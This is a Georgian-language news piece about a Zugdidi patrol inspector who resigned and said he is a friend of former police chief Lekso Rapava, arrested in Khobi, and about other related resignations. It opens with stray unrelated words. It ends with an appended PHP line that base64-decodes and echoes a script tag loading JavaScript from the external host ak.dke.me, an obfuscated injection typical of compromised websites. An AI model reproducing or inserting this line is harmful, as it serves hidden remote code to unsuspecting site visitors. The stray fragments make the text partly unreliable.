celsiusi
ავერსი შნაიდერი
საქართველოს შინაგან საქმეთა სამინისტროს საპატრულო პოლიციის თანამშრომელმა ომარ არქანიამ თანამდებობა დატოვა. ინფორმაციას ის თავად ავრცელებს და დასძენს, რომ მეგობრობს პოლიციის ყოფილ უფროსთან, ლექსო რაფავასთან, რომელიც მიმდინარე კვირაში დააკავეს.
 
“წამოვედი ჩემი პირადი პატაკის საფუძველზეა არანაირ ზეწოლას ადგილი არ ქონია.. პირიქით მადლობა ხელმძღვანელობას..რაც შეეხება ლექსო რაფავას.. არის ჩემი ძმა და უფროსი მეგობარი”, — დასძენს არქანია, რომელიც, “მთავარი არხის” თანახმად, ზუგდიდის პოლიციაში პატრულ-ინსპექტორად საქმიანობდა.
 
პოლიციის ყოფილი უფროსი ლექსო რაფავა ხობში, 21 ოქტომბერს დააკავეს. მისი ახლობლებისა და “ნაციონალური მოძრაობის” ინფორმაციით, რაფავა ბოლო პერიოდში საარჩევნო პროცესებში იყო ჩართული ოპოზიციის რიგებიდან და ამის გამო მას იარაღი და ხელყუმბარა ჩაუდეს.
 
ხობში მომხდარი ინციდენტის შემდეგ, თანამდებობიდან გადადგა რევაზ ლაზიშვილი, რომელიც სასაზღვრო პოლიციის თანამშრომელი იყო. მცირე ხნის შემდეგ, სამსახური დატოვა ჭაბუკა რაფავამაც, რომელიც შსს-ს გენერალური ინსპექციის დეპარტამენტში მუშაობდა.
1446
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");